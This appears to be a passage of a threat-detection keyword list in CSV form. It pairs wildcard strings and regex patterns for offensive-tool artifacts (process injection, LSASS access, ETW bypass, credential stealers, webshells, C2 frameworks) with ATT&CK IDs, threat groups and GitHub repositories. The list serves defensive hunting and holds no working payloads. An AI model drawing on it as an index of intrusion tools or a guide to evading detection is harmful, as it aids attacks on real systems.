"*inject-assembly.cna*",".{0,1000}inject\-assembly\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","48515"
"*injectassembly.x64.bin*",".{0,1000}injectassembly\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","48516"
"*injectassembly.x64.o*",".{0,1000}injectassembly\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","48517"
"*Inject-BypassStuff *",".{0,1000}Inject\-BypassStuff\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48518"
"*Inject-BypassStuff*",".{0,1000}Inject\-BypassStuff.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48519"
"*InjectDll RTVideo.dll*",".{0,1000}InjectDll\sRTVideo\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","48520"
"*InjectDll.cpp*",".{0,1000}InjectDll\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48521"
"*InjectDll.vcxproj*",".{0,1000}InjectDll\.vcxproj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48522"
"*injected into LSASS*",".{0,1000}injected\sinto\sLSASS.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","New-HoneyHash.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48523"
"*Injected Word document has been saved!*",".{0,1000}Injected\sWord\sdocument\shas\sbeen\ssaved!.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#content","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","48524"
"*Injected! Check your listener!*",".{0,1000}Injected!\sCheck\syour\slistener!.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","48525"
"*InjectedCredentials.csv*",".{0,1000}InjectedCredentials\.csv.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","48526"
"*injectEtwBypass*",".{0,1000}injectEtwBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","N/A","10","10","279","55","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z","48527"
"*inject-etw-bypass*",".{0,1000}inject\-etw\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","48528"
"*injectify*",".{0,1000}injectify.{0,1000}","offensive_tool_keyword","injectify","Perform advanced MiTM attacks on websites with ease.","T1557.001 - T1190 - T1071.001 - T1056.001","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/samdenty/injectify","1","0","N/A","N/A","N/A","7","674","119","2024-03-25T09:04:38Z","2017-11-06T17:01:50Z","48529"
"*Injecting backdoor into discord*",".{0,1000}Injecting\sbackdoor\sinto\sdiscord.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","48530"
"*Injecting converted DLL shellcode into remote process*",".{0,1000}Injecting\sconverted\sDLL\sshellcode\sinto\sremote\sprocess.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48531"
"*Injecting into mstsc.exe*",".{0,1000}Injecting\sinto\smstsc\.exe.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","48532"
"*Injecting NetRipper into process with ID *",".{0,1000}Injecting\sNetRipper\sinto\sprocess\swith\sID\s.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","48533"
"*Injecting Reflective DLL into remote process*",".{0,1000}Injecting\sReflective\sDLL\sinto\sremote\sprocess.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48534"
"*Injecting shellcode into PID: *",".{0,1000}Injecting\sshellcode\sinto\sPID\:\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","48535"
"*Injecting shellcode into PID: *",".{0,1000}Injecting\sshellcode\sinto\sPID\:\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","48536"
"*Injecting shellcode into PowerShell*",".{0,1000}Injecting\sshellcode\sinto\sPowerShell.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","48537"
"*Injecting shellcode into the running PowerShell process*",".{0,1000}Injecting\sshellcode\sinto\sthe\srunning\sPowerShell\sprocess.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","48538"
"*Injection done! Check your listener!*",".{0,1000}Injection\sdone!\sCheck\syour\slistener!.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","48539"
"*Injection* -ProcName lsass*",".{0,1000}Injection.{0,1000}\s\-ProcName\slsass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-PSInject.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48540"
"*Injection\Spawn32*",".{0,1000}Injection\\Spawn32.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48541"
"*Injection\Spawn64*",".{0,1000}Injection\\Spawn64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48542"
"*Injection-Exploit-1.0-SNAPSHOT-all.jar*",".{0,1000}Injection\-Exploit\-1\.0\-SNAPSHOT\-all\.jar.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","N/A","10","2682","733","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z","48543"
"*Injections/Traversal.txt*",".{0,1000}Injections\/Traversal\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","48544"
"*Injections/XSS.txt*",".{0,1000}Injections\/XSS\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","48545"
"*InjectLibraryClient.exe -*",".{0,1000}InjectLibraryClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","48546"
"*InjectLibraryDrv_x64.sys*",".{0,1000}InjectLibraryDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","48547"
